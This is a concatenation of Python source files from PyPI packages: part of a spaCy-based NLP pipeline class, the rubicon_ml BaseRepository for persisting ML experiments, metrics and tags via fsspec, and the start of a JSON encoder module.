The operations to perform to a corpus. The operations availables are:
- token: tokenization
- lemma: lemmatization
- pos: Part Of Speech
Methods
--------
fit: compute the functions selected in `self.functions`
"""
def __init__(
self,
model: str = "en_core_web_trf",
functions: Callable = ["token", "lemma", "pos"],
):
self.functions = functions
self.nlp = spacy.load(model)
def _check_func(self, func: Callable, doc: str):
"""
Check what is the function in order to return the proper result
Arguments
----------
func: str
The function to check
doc: str
The sentence to apply the function
Returns
--------
The result of compute `func` to the `sentence`
"""
if func == "token":
return [word for word in doc]
elif func == "lemma":
return [word.lemma_ for word in doc]
return [word.pos_ for word in doc]
def fit(self, corpus: List[str], verbose: bool = True):
"""
Compute the functions selected in `self.functions`
Arguments:
-----------
corpus: list[str]
All the sentences to compute the operations
verbose: Bool
Run with verbose or not (tqdm)
Returns
--------
A dictionary using `self.functions` as a key and the result of the operation as a value
"""
nlp_parse = tqdm_manager(corpus, self.nlp, verbose)
results = {"nlp": nlp_parse}
for func in self.functions:
result_per_func = []
for sentence in nlp_parse:
result_per_func.append(self._check_func(func, sentence))
results[func] = result_per_func
return results | /rubiales_nlp-0.1.0.tar.gz/rubiales_nlp-0.1.0/rubiales_nlp/pipelines.py | 0.928275 | 0.675009 | pipelines.py | pypi |
import os
import shutil
import tempfile
import warnings
from datetime import datetime
from typing import List, Optional
from zipfile import ZipFile
import fsspec
import pandas as pd
from rubicon_ml import domain
from rubicon_ml.exceptions import RubiconException
from rubicon_ml.repository.utils import json, slugify
class BaseRepository:
"""The base repository defines all the shared interactions
between the various Rubicon persistence options.
`BaseRepositoy` itself should never be used directly. Use
one of the repositories that extends this class to persist
Rubicon data:
* `rubicon.repository.MemoryRepository`
* `rubicon.repository.LocalRepository`
* `rubicon.repository.S3Repository`
Parameters
----------
root_dir : str
Absolute path to the root directory to persist Rubicon
data to.
storage_options : dict, optional
Additional keyword arguments that are passed directly to
the underlying filesystem class.
"""
def __init__(self, root_dir, **storage_options):
self.filesystem = fsspec.filesystem(self.PROTOCOL, **storage_options)
self.root_dir = root_dir.rstrip("/")
# --- Filesystem Helpers ---
def _cat(self, path):
"""Returns the contents of the file at `path`."""
return self.filesystem.cat(path)
def _cat_paths(self, metadata_paths):
"""Cat `metadata_paths` to get the list of files to include.
Ignore FileNotFoundErrors to avoid misc file errors, like hidden
dotfiles.
"""
files = []
for path, metadata in self.filesystem.cat(metadata_paths, on_error="return").items():
if isinstance(metadata, FileNotFoundError):
warning = f"{path} not found. Was this file unintentionally created?"
warnings.warn(warning)
else:
files.append(metadata)
return files
def _exists(self, path):
"""Returns True if a file exists at `path`, False otherwise."""
return self.filesystem.exists(path)
def _glob(self, globstring):
"""Returns the names of the files matching `globstring`."""
return self.filesystem.glob(globstring, detail=True)
def _ls_directories_only(self, path):
"""Returns the names of all the directories at path `path`."""
directories = [
os.path.join(p.get("name"), "metadata.json")
for p in self.filesystem.ls(path, detail=True)
if p.get("type", p.get("StorageClass")).lower() == "directory"
]
return directories
def _ls(self, path):
return self.filesystem.ls(path)
def _mkdir(self, dirpath):
"""Creates a directory `dirpath` with parents."""
return self.filesystem.mkdirs(dirpath, exist_ok=True)
def _modified(self, path):
return self.filesystem.modified(path)
def _persist_bytes(self, bytes_data, path):
"""Write bytes to the filesystem.
To be implemented by extensions of the base filesystem.
"""
raise NotImplementedError()
def _persist_domain(self, domain, path):
"""Write a domain object to the filesystem.
To be implemented by extensions of the base filesystem.
"""
raise NotImplementedError()
def _read_bytes(self, path, err_msg=None):
"""Read bytes from the file at `path`."""
try:
open_file = self.filesystem.open(path, "rb")
except FileNotFoundError:
raise RubiconException(err_msg)
return open_file.read()
def _read_domain(self, path, err_msg=None):
"""Read a domain object from the file at `path`."""
try:
open_file = self.filesystem.open(path)
except FileNotFoundError:
raise RubiconException(err_msg)
return json.load(open_file)
def _rm(self, path):
"""Recursively remove all files at `path`."""
return self.filesystem.rm(path, recursive=True)
# -------- Projects --------
def _get_project_metadata_path(self, project_name):
"""Returns the path of the project with name `project_name`'s
metadata.
"""
return f"{self.root_dir}/{slugify(project_name)}/metadata.json"
def create_project(self, project):
"""Persist a project to the configured filesystem.
Parameters
----------
project : rubicon.domain.Project
The project to persist.
"""
project_metadata_path = self._get_project_metadata_path(project.name)
if self._exists(project_metadata_path):
raise RubiconException(f"A project with name '{project.name}' already exists.")
self._persist_domain(project, project_metadata_path)
def get_project(self, project_name):
"""Retrieve a project from the configured filesystem.
Parameters
----------
project_name : str
The name of the project to retrieve.
Returns
-------
rubicon.domain.Project
The project with name `project_name`.
"""
project_metadata_path = self._get_project_metadata_path(project_name)
try:
project = json.loads(self._cat(project_metadata_path))
except FileNotFoundError:
raise RubiconException(f"No project with name '{project_name}' found.")
return domain.Project(**project)
def get_projects(self):
"""Get the list of projects from the filesystem.
Returns
-------
list of rubicon.domain.Project
The list of projects from the filesystem.
"""
try:
project_metadata_paths = self._ls_directories_only(self.root_dir)
projects = [
domain.Project(**json.loads(metadata))
for metadata in self._cat_paths(project_metadata_paths)
]
projects.sort(key=lambda p: p.created_at)
except FileNotFoundError:
return []
return projects
# ------ Experiments -------
def _get_experiment_metadata_root(self, project_name):
"""Returns the experiments directory of the project with
name `project_name`.
"""
return f"{self.root_dir}/{slugify(project_name)}/experiments"
def _get_experiment_metadata_path(self, project_name, experiment_id):
"""Returns the path of the experiment with ID
`experiment_id`'s metadata.
"""
experiment_metadata_root = self._get_experiment_metadata_root(project_name)
return f"{experiment_metadata_root}/{experiment_id}/metadata.json"
def create_experiment(self, experiment):
"""Persist an experiment to the configured filesystem.
Parameters
----------
experiment : rubicon.domain.Experiment
The experiment to persist.
"""
experiment_metadata_path = self._get_experiment_metadata_path(
experiment.project_name, experiment.id
)
self._persist_domain(experiment, experiment_metadata_path)
def get_experiment(self, project_name, experiment_id):
"""Retrieve an experiment from the configured filesystem.
Parameters
----------
project_name : str
The name of the project the experiment with ID
`experiment_id` is logged to.
experiment_id : str
The ID of the experiment to retrieve.
Returns
-------
rubicon.domain.Experiment
The experiment with ID `experiment_id`.
"""
experiment_metadata_path = self._get_experiment_metadata_path(project_name, experiment_id)
experiment = self._read_domain(
experiment_metadata_path,
f"No experiment with id `{experiment_id}` found.",
)
return domain.Experiment(**experiment)
def get_experiments(self, project_name):
"""Retrieve all experiments from the configured filesystem
that belong to the project with name `project_name`.
Parameters
----------
project_name : str
The name of the project to retrieve all experiments
from.
Returns
-------
list of rubicon.domain.Experiment
The experiments logged to the project with name
`project_name`.
"""
experiment_metadata_root = self._get_experiment_metadata_root(project_name)
try:
experiment_metadata_paths = self._ls_directories_only(experiment_metadata_root)
experiments = [
domain.Experiment(**json.loads(metadata))
for metadata in self._cat_paths(experiment_metadata_paths)
]
experiments.sort(key=lambda e: e.created_at)
except FileNotFoundError:
return []
return experiments
# ------- Archiving --------
def _archive(
self,
project_name,
experiments: Optional[List] = None,
remote_rubicon_root: Optional[str] = None,
):
"""Archive the experiments logged to this project.
Parameters
----------
project_name : str
Name of the calling project (project to create archive for)
experiments : list of Experiments, optional
The rubicon.client.Experiment objects to archive. If None all logged experiments are archived.
remote_rubicon_root : str or pathlike object, optional
The remote root of the repository to archive to
Returns
-------
filepath of newly created archive
"""
remote_s3 = True if remote_rubicon_root and remote_rubicon_root.startswith("s3") else False
root_dir = remote_rubicon_root if remote_rubicon_root is not None else self.root_dir
archive_dir = os.path.join(root_dir, slugify(project_name), "archives")
ts = datetime.timestamp(datetime.now())
archive_path = os.path.join(archive_dir, "archive-" + str(ts))
zip_archive_filename = str(archive_path + ".zip")
experiments_path = self._get_experiment_metadata_root(project_name)
if not remote_s3:
if not self._exists(archive_dir):
self._mkdir(archive_dir)
file_name = None
with tempfile.NamedTemporaryFile() as tf:
if experiments is not None:
with ZipFile(tf, "x") as archive:
experiment_paths = []
for experiment in experiments:
experiment_paths.append(os.path.join(experiments_path, experiment.id))
for file_path in experiment_paths:
archive.write(file_path, os.path.basename(file_path))
file_name = archive.filename
else:
file_name = shutil.make_archive(tf.name, "zip", experiments_path)
with fsspec.open(zip_archive_filename, "wb") as fp:
with open(file_name, "rb") as tf:
fp.write(tf.read())
return zip_archive_filename
def _experiments_from_archive(
self, project_name, remote_rubicon_root: str, latest_only: Optional[bool] = False
):
"""Retrieve archived experiments into this project's experiments folder.
Parameters
----------
project_name : str
Name of the calling project (project to read experiments into)
remote_rubicon_root : str or pathlike object
The remote Rubicon object with the repository containing archived experiments to read in
latest_only : bool, optional
Indicates whether or not experiments should only be read from the latest archive
"""
root_dir = self.root_dir
shutil.copy(
os.path.join(remote_rubicon_root, slugify(project_name), "metadata.json"),
os.path.join(root_dir, slugify(project_name)),
)
archive_dir = os.path.join(remote_rubicon_root, slugify(project_name), "archives")
if not self._exists(archive_dir):
raise ValueError("`remote_rubicon_root` has no archives")
dest_experiments_dir = self._get_experiment_metadata_root(project_name)
if not self._exists(dest_experiments_dir):
self._mkdir(dest_experiments_dir)
og_num_experiments = len(self._ls(dest_experiments_dir))
if not latest_only:
for zip_archive_name in self._ls(archive_dir):
zip_archive_filepath = os.path.join(archive_dir, zip_archive_name)
with ZipFile(zip_archive_filepath, "r") as curr_archive:
curr_archive.extractall(dest_experiments_dir)
else:
latest_zip_archive_filepath = None
latest_time = None
for zip_archive in self._ls(archive_dir):
zip_archive_filepath = os.path.join(archive_dir, zip_archive)
mod_time = self._modified(zip_archive_filepath)
if latest_time is None:
latest_time = mod_time
latest_zip_archive_filepath = zip_archive_filepath
elif mod_time > latest_time:
latest_zip_archive_filepath = zip_archive_filepath
latest_time = mod_time
with ZipFile(latest_zip_archive_filepath, "r") as zip_archive:
zip_archive.extractall(dest_experiments_dir)
if len(self._ls(dest_experiments_dir)) > og_num_experiments:
print("experiments read from archive")
else:
print("experiments not read from archive")
# ------- Artifacts --------
def _get_artifact_metadata_root(self, project_name, experiment_id=None):
"""Returns the artifacts directory of the project with name
`project_name` or experiment with ID `experiment_id`.
"""
if experiment_id is not None:
experiment_metadata_root = self._get_experiment_metadata_root(project_name)
return f"{experiment_metadata_root}/{experiment_id}/artifacts"
else:
return f"{self.root_dir}/{slugify(project_name)}/artifacts"
def _get_artifact_metadata_path(self, project_name, experiment_id, artifact_id):
"""Returns the path of the artifact with ID `artifact_id`'s
metadata.
"""
artifact_metadata_root = self._get_artifact_metadata_root(project_name, experiment_id)
return f"{artifact_metadata_root}/{artifact_id}/metadata.json"
def _get_artifact_data_path(self, project_name, experiment_id, artifact_id):
"""Returns the path of the artifact with ID `artifact_id`'s
raw data.
"""
artifact_metadata_root = self._get_artifact_metadata_root(project_name, experiment_id)
return f"{artifact_metadata_root}/{artifact_id}/data"
def create_artifact(self, artifact, data, project_name, experiment_id=None):
"""Persist an artifact to the configured filesystem.
Parameters
----------
artifact : rubicon.domain.Artifact
The artifact to persist.
data : bytes
The raw data to persist as an artifact.
project_name : str
The name of the project this artifact belongs to.
experiment_id : str, optional
The ID of the experiment this artifact belongs to.
Artifacts do not need to belong to an experiment.
"""
artifact_metadata_path = self._get_artifact_metadata_path(
project_name, experiment_id, artifact.id
)
artifact_data_path = self._get_artifact_data_path(project_name, experiment_id, artifact.id)
self._persist_bytes(data, artifact_data_path)
self._persist_domain(artifact, artifact_metadata_path)
def get_artifact_metadata(self, project_name, artifact_id, experiment_id=None):
"""Retrieve an artifact's metadata from the configured filesystem.
Parameters
----------
project_name : str
The name of the project the artifact with ID
`artifact_id` is logged to.
artifact_id : str
The ID of the artifact to retrieve.
experiment_id : str, optional
The ID of the experiment the artifact with ID
`artifact_id` is logged to. Artifacts do not
need to belong to an experiment.
Returns
-------
rubicon.domain.Artifact
The artifact with ID `artifact_id`.
"""
artifact_metadata_path = self._get_artifact_metadata_path(
project_name, experiment_id, artifact_id
)
artifact = self._read_domain(
artifact_metadata_path,
f"No artifact with id `{artifact_id}` found.",
)
return domain.Artifact(**artifact)
def get_artifacts_metadata(self, project_name, experiment_id=None):
"""Retrieve all artifacts' metadata from the configured
filesystem that belong to the specified object.
Parameters
----------
project_name : str
The name of the project to retrieve all artifacts
from.
experiment_id : str, optional
The ID of the experiment to retrieve all artifacts
from. Artifacts do not need to belong to an
experiment.
Returns
-------
list of rubicon.domain.Artifact
The artifacts logged to the specified object.
"""
artifact_metadata_root = self._get_artifact_metadata_root(project_name, experiment_id)
try:
artifact_metadata_paths = self._ls_directories_only(artifact_metadata_root)
artifacts = [
domain.Artifact(**json.loads(metadata))
for metadata in self._cat_paths(artifact_metadata_paths)
]
artifacts.sort(key=lambda a: a.created_at)
except FileNotFoundError:
return []
return artifacts
def get_artifact_data(self, project_name, artifact_id, experiment_id=None):
"""Retrieve an artifact's raw data.
Parameters
----------
project_name : str
The name of the project the artifact with ID
`artifact_id` is logged to.
artifact_id : str
The ID of the artifact to retrieve data from.
experiment_id : str, optional
The ID of the experiment the artifact with ID
`artifact_id` is logged to. Artifacts do not
need to belong to an experiment.
Returns
-------
bytes
The artifact with ID `artifact_id`'s raw data.
"""
artifact_data_path = self._get_artifact_data_path(project_name, experiment_id, artifact_id)
artifact_data = self._read_bytes(
artifact_data_path,
f"No data for artifact with id `{artifact_id}` found.",
)
return artifact_data
def delete_artifact(self, project_name, artifact_id, experiment_id=None):
"""Delete an artifact from the configured filesystem.
Parameters
----------
project_name : str
The name of the project the artifact with ID
`artifact_id` is logged to.
artifact_id : str
The ID of the artifact to delete.
experiment_id : str, optional
The ID of the experiment the artifact with ID
`artifact_id` is logged to. Artifacts do not
need to belong to an experiment.
"""
artifact_metadata_root = self._get_artifact_metadata_root(project_name, experiment_id)
try:
self._rm(f"{artifact_metadata_root}/{artifact_id}")
except FileNotFoundError:
raise RubiconException(f"No artifact with id `{artifact_id}` found.")
# ------- Dataframes -------
def _get_dataframe_metadata_root(self, project_name, experiment_id=None):
"""Returns the dataframes directory of the project with name
`project_name` or experiment with ID `experiment_id`.
"""
if experiment_id is not None:
experiment_metadata_root = self._get_experiment_metadata_root(project_name)
return f"{experiment_metadata_root}/{experiment_id}/dataframes"
else:
return f"{self.root_dir}/{slugify(project_name)}/dataframes"
def _get_dataframe_metadata_path(self, project_name, experiment_id, dataframe_id):
"""Returns the path of the dataframe with ID `dataframe_id`'s
metadata.
"""
dataframe_metadata_root = self._get_dataframe_metadata_root(project_name, experiment_id)
return f"{dataframe_metadata_root}/{dataframe_id}/metadata.json"
def _get_dataframe_data_path(self, project_name, experiment_id, dataframe_id):
"""Returns the path of the dataframe with ID `dataframe_id`'s
raw data.
"""
dataframe_metadata_root = self._get_dataframe_metadata_root(project_name, experiment_id)
return f"{dataframe_metadata_root}/{dataframe_id}/data"
def _persist_dataframe(self, df, path):
"""Persists the dataframe `df` to the configured filesystem.
Note
----
`dask` dataframes will automatically be split into chunks by `dask.dataframe.to_parquet`.
`pandas` dataframes, however, will be saved as a single file with the hope that users
would leverage dask for large dataframes.
"""
if isinstance(df, pd.DataFrame):
self._mkdir(path)
path = f"{path}/data.parquet"
df.to_parquet(path, engine="pyarrow")
def _read_dataframe(self, path, df_type="pandas"):
"""Reads the dataframe `df` from the configured filesystem."""
df = None
acceptable_types = ["pandas", "dask"]
if df_type not in acceptable_types:
raise ValueError(f"`df_type` must be one of {acceptable_types}")
if df_type == "pandas":
path = f"{path}/data.parquet"
df = pd.read_parquet(path, engine="pyarrow")
else:
try:
from dask import dataframe as dd
except ImportError:
raise RubiconException(
"`rubicon_ml` requires `dask` to be installed in the current environment "
"to read dataframes with `df_type`='dask'. `pip install dask[dataframe]` "
"or `conda install dask` to continue."
)
df = dd.read_parquet(path, engine="pyarrow")
return df
def create_dataframe(self, dataframe, data, project_name, experiment_id=None):
"""Persist a dataframe to the configured filesystem.
Parameters
----------
dataframe : rubicon.domain.Dataframe
The dataframe to persist.
data : dask.dataframe.DataFrame or pandas.DataFrame
The raw data to persist as a dataframe. All
dataframes are persisted as `dask` dataframes.
project_name : str
The name of the project this dataframe belongs to.
experiment_id : str, optional
The ID of the experiment this dataframe belongs to.
Dataframes do not need to belong to an experiment.
"""
dataframe_metadata_path = self._get_dataframe_metadata_path(
project_name, experiment_id, dataframe.id
)
dataframe_data_path = self._get_dataframe_data_path(
project_name, experiment_id, dataframe.id
)
self._persist_dataframe(data, dataframe_data_path)
self._persist_domain(dataframe, dataframe_metadata_path)
def get_dataframe_metadata(self, project_name, dataframe_id, experiment_id=None):
"""Retrieve a dataframes's metadata from the configured filesystem.
Parameters
----------
project_name : str
The name of the project the dataframe with ID
`dataframe_id` is logged to.
dataframe_id : str
The ID of the dataframe to retrieve.
experiment_id : str, optional
The ID of the experiment the dataframe with ID
`dataframe_id` is logged to. Dataframes do not
need to belong to an experiment.
Returns
-------
rubicon.domain.Dataframe
The dataframe with ID `dataframe_id`.
"""
dataframe_metadata_path = self._get_dataframe_metadata_path(
project_name, experiment_id, dataframe_id
)
dataframe = self._read_domain(
dataframe_metadata_path,
f"No dataframe with id `{dataframe_id}` found.",
)
return domain.Dataframe(**dataframe)
def get_dataframes_metadata(self, project_name, experiment_id=None):
"""Retrieve all dataframes' metadata from the configured
filesystem that belong to the specified object.
Parameters
----------
project_name : str
The name of the project to retrieve all dataframes
from.
experiment_id : str, optional
The ID of the experiment to retrieve all dataframes
from. Dataframes do not need to belong to an
experiment.
Returns
-------
list of rubicon.domain.Dataframe
The dataframes logged to the specified object.
"""
dataframe_metadata_root = self._get_dataframe_metadata_root(project_name, experiment_id)
try:
dataframe_metadata_paths = self._ls_directories_only(dataframe_metadata_root)
dataframes = [
domain.Dataframe(**json.loads(metadata))
for metadata in self._cat_paths(dataframe_metadata_paths)
]
dataframes.sort(key=lambda d: d.created_at)
except FileNotFoundError:
return []
return dataframes
def get_dataframe_data(self, project_name, dataframe_id, experiment_id=None, df_type="pandas"):
"""Retrieve a dataframe's raw data.
Parameters
----------
project_name : str
The name of the project the dataframe with ID
`dataframe_id` is logged to.
dataframe_id : str
The ID of the dataframe to retrieve data from.
experiment_id : str, optional
The ID of the experiment the dataframe with ID
`artifact_id` is logged to. Dataframes do not
need to belong to an experiment.
df_type : str, optional
The type of dataframe. Can be either `pandas` or `dask`.
Returns
-------
dask.dataframe.DataFrame
The dataframe with ID `dataframe_id`'s raw data.
"""
dataframe_data_path = self._get_dataframe_data_path(
project_name, experiment_id, dataframe_id
)
try:
df = self._read_dataframe(dataframe_data_path, df_type)
except FileNotFoundError:
raise RubiconException(
f"No data for dataframe with id `{dataframe_id}` found. This might have "
"happened if you forgot to set `df_type='dask'` when trying to read a `dask` dataframe."
)
return df
def delete_dataframe(self, project_name, dataframe_id, experiment_id=None):
"""Delete a dataframe from the configured filesystem.
Parameters
----------
project_name : str
The name of the project the dataframe with ID
`dataframe_id` is logged to.
dataframe_id : str
The ID of the dataframe to delete.
experiment_id : str, optional
The ID of the experiment the dataframe with ID
`artifact_id` is logged to. Dataframes do not
need to belong to an experiment.
"""
dataframe_metadata_root = self._get_dataframe_metadata_root(project_name, experiment_id)
try:
self._rm(f"{dataframe_metadata_root}/{dataframe_id}")
except FileNotFoundError:
raise RubiconException(f"No dataframe with id `{dataframe_id}` found.")
# -------- Features --------
def _get_feature_metadata_root(self, project_name, experiment_id):
"""Returns the features directory of the experiment with
ID `experiment_id`.
"""
experiment_metadata_root = self._get_experiment_metadata_root(project_name)
return f"{experiment_metadata_root}/{experiment_id}/features"
def _get_feature_metadata_path(self, project_name, experiment_id, feature_name):
"""Returns the path of the feature with name `feature_name`'s
metadata.
"""
feature_metadata_root = self._get_feature_metadata_root(project_name, experiment_id)
return f"{feature_metadata_root}/{slugify(feature_name)}/metadata.json"
def create_feature(self, feature, project_name, experiment_id):
"""Persist a feature to the configured filesystem.
Parameters
----------
feature : rubicon.domain.Feature
The feature to persist.
project_name : str
The name of the project the experiment with ID
`experiment_id` is logged to.
experiment_id : str
The ID of the experiment this feature belongs to.
"""
feature_metadata_path = self._get_feature_metadata_path(
project_name, experiment_id, feature.name
)
if self._exists(feature_metadata_path):
raise RubiconException(f"A feature with name '{feature.name}' already exists.")
self._persist_domain(feature, feature_metadata_path)
def get_feature(self, project_name, experiment_id, feature_name):
"""Retrieve a feature from the configured filesystem.
Parameters
----------
project_name : str
The name of the project the experiment with ID
`experiment_id` is logged to.
experiment_id : str
The ID of the experiment the feature with name
`feature_name` is logged to.
feature_name : str
The name of the feature to retrieve.
Returns
-------
rubicon.domain.Feature
The feature with name `feature_name`.
"""
feature_metadata_path = self._get_feature_metadata_path(
project_name, experiment_id, feature_name
)
feature = self._read_domain(
feature_metadata_path,
f"No feature with name '{feature_name}' found.",
)
return domain.Feature(**feature)
def get_features(self, project_name, experiment_id):
"""Retrieve all features from the configured filesystem
that belong to the experiment with ID `experiment_id`.
Parameters
----------
project_name : str
The name of the project the experiment with ID
`experiment_id` is logged to.
experiment_id : str
The ID of the experiment to retrieve all features
from.
Returns
-------
list of rubicon.domain.Feature
The features logged to the experiment with ID
`experiment_id`.
"""
feature_metadata_root = self._get_feature_metadata_root(project_name, experiment_id)
try:
feature_metadata_paths = self._ls_directories_only(feature_metadata_root)
features = [
domain.Feature(**json.loads(metadata))
for metadata in self._cat_paths(feature_metadata_paths)
]
features.sort(key=lambda f: f.created_at)
except FileNotFoundError:
return []
return features
# -------- Metrics ---------
def _get_metric_metadata_root(self, project_name, experiment_id):
"""Returns the metrics directory of the experiment with
ID `experiment_id`.
"""
experiment_metadata_root = self._get_experiment_metadata_root(project_name)
return f"{experiment_metadata_root}/{experiment_id}/metrics"
def _get_metric_metadata_path(self, project_name, experiment_id, metric_name):
"""Returns the path of the metric with name `metric_name`'s
metadata.
"""
metric_metadata_root = self._get_metric_metadata_root(project_name, experiment_id)
return f"{metric_metadata_root}/{slugify(metric_name)}/metadata.json"
def create_metric(self, metric, project_name, experiment_id):
"""Persist a metric to the configured filesystem.
Parameters
----------
metric : rubicon.domain.Metric
The metric to persist.
project_name : str
The name of the project the experiment with ID
`experiment_id` is logged to.
experiment_id : str
The ID of the experiment this metric belongs to.
"""
metric_metadata_path = self._get_metric_metadata_path(
project_name, experiment_id, metric.name
)
if self._exists(metric_metadata_path):
raise RubiconException(f"A metric with name '{metric.name}' already exists.")
self._persist_domain(metric, metric_metadata_path)
def get_metric(self, project_name, experiment_id, metric_name):
"""Retrieve a metric from the configured filesystem.
Parameters
----------
project_name : str
The name of the project the experiment with ID
`experiment_id` is logged to.
experiment_id : str
The ID of the experiment the metric with name
`metric_name` is logged to.
metric_name : str
The name of the metric to retrieve.
Returns
-------
rubicon.domain.Metric
The metric with name `metric_name`.
"""
metric_metadata_path = self._get_metric_metadata_path(
project_name, experiment_id, metric_name
)
metric = self._read_domain(
metric_metadata_path,
f"No metric with name '{metric_name}' found.",
)
return domain.Metric(**metric)
def get_metrics(self, project_name, experiment_id):
"""Retrieve all metrics from the configured filesystem
that belong to the experiment with ID `experiment_id`.
Parameters
----------
project_name : str
The name of the project the experiment with ID
`experiment_id` is logged to.
experiment_id : str
The ID of the experiment to retrieve all metrics
from.
Returns
-------
list of rubicon.domain.Metric
The metrics logged to the experiment with ID
`experiment_id`.
"""
metric_metadata_root = self._get_metric_metadata_root(project_name, experiment_id)
try:
metric_metadata_paths = self._ls_directories_only(metric_metadata_root)
metrics = [
domain.Metric(**json.loads(metadata))
for metadata in self._cat_paths(metric_metadata_paths)
]
metrics.sort(key=lambda m: m.created_at)
except FileNotFoundError:
return []
return metrics
# ------- Parameters -------
def _get_parameter_metadata_root(self, project_name, experiment_id):
"""Returns the parameters directory of the experiment with
ID `experiment_id`.
"""
experiment_metadata_root = self._get_experiment_metadata_root(project_name)
return f"{experiment_metadata_root}/{experiment_id}/parameters"
def _get_parameter_metadata_path(self, project_name, experiment_id, parameter_name):
"""Returns the path of the parameter with name `parameter_name`'s
metadata.
"""
parameter_metadata_root = self._get_parameter_metadata_root(project_name, experiment_id)
return f"{parameter_metadata_root}/{slugify(parameter_name)}/metadata.json"
def create_parameter(self, parameter, project_name, experiment_id):
"""Persist a parameter to the configured filesystem.
Parameters
----------
parameter : rubicon.domain.Parameter
The parameter to persist.
project_name : str
The name of the project the experiment with ID
`experiment_id` is logged to.
experiment_id : str
The ID of the experiment this parameter belongs to.
"""
parameter_metadata_path = self._get_parameter_metadata_path(
project_name, experiment_id, parameter.name
)
if self._exists(parameter_metadata_path):
raise RubiconException(f"A parameter with name '{parameter.name}' already exists.")
self._persist_domain(parameter, parameter_metadata_path)
def get_parameter(self, project_name, experiment_id, parameter_name):
"""Retrieve a parameter from the configured filesystem.
Parameters
----------
project_name : str
The name of the project this parameter belongs to.
experiment_id : str
The ID of the experiment the parameter with name
`parameter_name` is logged to.
parameter_name : str
The name of the parameter to retrieve.
Returns
-------
rubicon.domain.Parameter
The parameter with name `parameter_name`.
"""
parameter_metadata_path = self._get_parameter_metadata_path(
project_name, experiment_id, parameter_name
)
parameter = self._read_domain(
parameter_metadata_path,
f"No parameter with name '{parameter_name}' found.",
)
return domain.Parameter(**parameter)
def get_parameters(self, project_name, experiment_id):
"""Retrieve all parameters from the configured filesystem
that belong to the experiment with ID `experiment_id`.
Parameters
----------
project_name : str
The name of the project the experiment with ID
`experiment_id` is logged to.
experiment_id : str
The ID of the experiment to retrieve all parameters
from.
Returns
-------
list of rubicon.domain.Parameter
The parameters logged to the experiment with ID
`experiment_id`.
"""
parameter_metadata_root = self._get_parameter_metadata_root(project_name, experiment_id)
try:
parameter_metadata_paths = self._ls_directories_only(parameter_metadata_root)
parameters = [
domain.Parameter(**json.loads(metadata))
for metadata in self._cat_paths(parameter_metadata_paths)
]
parameters.sort(key=lambda p: p.created_at)
except FileNotFoundError:
return []
return parameters
# ---------- Tags ----------
def _get_tag_metadata_root(
self, project_name, experiment_id=None, entity_identifier=None, entity_type=None
):
"""Returns the directory to write tags to."""
get_metadata_root_lookup = {
"Artifact": self._get_artifact_metadata_root,
"Dataframe": self._get_dataframe_metadata_root,
"Experiment": self._get_experiment_metadata_root,
"Metric": self._get_metric_metadata_root,
"Feature": self._get_feature_metadata_root,
"Parameter": self._get_parameter_metadata_root,
}
try:
get_metadata_root = get_metadata_root_lookup[entity_type]
except KeyError:
raise ValueError("`experiment_id` and `entity_identifier` can not both be `None`.")
if entity_type == "Experiment":
experiment_metadata_root = get_metadata_root(project_name)
return f"{experiment_metadata_root}/{experiment_id}"
else:
entity_metadata_root = get_metadata_root(project_name, experiment_id)
# We want to slugify the names of Metrics, Features, and Parameters- not Artifacts, Dataframes, or Experiments
if entity_type in ["Metric", "Feature", "Parameter"]:
entity_identifier = slugify(entity_identifier)
return f"{entity_metadata_root}/{entity_identifier}"
def add_tags(
self, project_name, tags, experiment_id=None, entity_identifier=None, entity_type=None
):
"""Persist tags to the configured filesystem.
Parameters
----------
project_name : str
The name of the project the object to tag
belongs to.
tags : list of str
The tag values to persist.
experiment_id : str, optional
The ID of the experiment to apply the tags
`tags` to.
entity_identifier : str, optional
The ID or name of the entity to apply the tags
`tags` to.
entity_type : str, optional
The name of the entity's type as returned by
`entity_cls.__class__.__name__`.
"""
tag_metadata_root = self._get_tag_metadata_root(
project_name, experiment_id, entity_identifier, entity_type
)
tag_metadata_path = f"{tag_metadata_root}/tags_{domain.utils.uuid.uuid4()}.json"
self._persist_domain({"added_tags": tags}, tag_metadata_path)
def remove_tags(
self, project_name, tags, experiment_id=None, entity_identifier=None, entity_type=None
):
"""Delete tags from the configured filesystem.
Parameters
----------
project_name : str
The name of the project the object to delete
tags from belongs to.
tags : list of str
The tag values to delete.
experiment_id : str, optional
The ID of the experiment to delete the tags
`tags` from.
entity_identifier : str, optional
The ID or name of the entity to apply the tags
`tags` to.
entity_type : str, optional
The name of the entity's type as returned by
`entity_cls.__class__.__name__`.
"""
tag_metadata_root = self._get_tag_metadata_root(
project_name, experiment_id, entity_identifier, entity_type
)
tag_metadata_path = f"{tag_metadata_root}/tags_{domain.utils.uuid.uuid4()}.json"
self._persist_domain({"removed_tags": tags}, tag_metadata_path)
def _sort_tag_paths(self, tag_paths):
"""Sorts the paths in `tags_paths` by when they were
created.
"""
if isinstance(tag_paths, dict):
tag_paths = tag_paths.values()
tag_paths_with_timestamps = [
(t.get("created", t.get("LastModified")), t.get("name")) for t in tag_paths
]
tag_paths_with_timestamps.sort()
return tag_paths_with_timestamps
def get_tags(self, project_name, experiment_id=None, entity_identifier=None, entity_type=None):
"""Retrieve tags from the configured filesystem.
Parameters
----------
project_name : str
The name of the project the object to retrieve
tags from belongs to.
experiment_id : str, optional
The ID of the experiment to retrieve tags from.
entity_identifier : str, optional
The ID or name of the entity to apply the tags
`tags` to.
entity_type : str, optional
The name of the entity's type as returned by
`entity_cls.__class__.__name__`.
Returns
-------
list of dict
A list of dictionaries with one key each,
`added_tags` or `removed_tags`, where the
value is a list of tag names that have been
added to or removed from the specified object.
"""
tag_metadata_root = self._get_tag_metadata_root(
project_name, experiment_id, entity_identifier, entity_type
)
tag_metadata_glob = f"{tag_metadata_root}/tags_*.json"
tag_paths = self._glob(tag_metadata_glob)
if len(tag_paths) == 0:
return []
sorted_tag_paths = self._sort_tag_paths(tag_paths)
tag_data = self._cat([p for _, p in sorted_tag_paths])
sorted_tag_data = [json.loads(tag_data[p]) for _, p in sorted_tag_paths]
return sorted_tag_data | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/repository/base.py | 0.873444 | 0.208562 | base.py | pypi |
import dataclasses
import json
from base64 import b64decode, b64encode
from datetime import date, datetime
import numpy as np
from rubicon_ml.domain.utils import TrainingMetadata
class DomainJSONEncoder(json.JSONEncoder):
def default(self, obj):
"""
Note - if we need to support nested objects
within dataclasses, we need to leverage asdict()
"""
if isinstance(obj, datetime):
return {"_type": "datetime", "value": obj.strftime("%Y-%m-%d %H:%M:%S.%f")}
elif isinstance(obj, date):
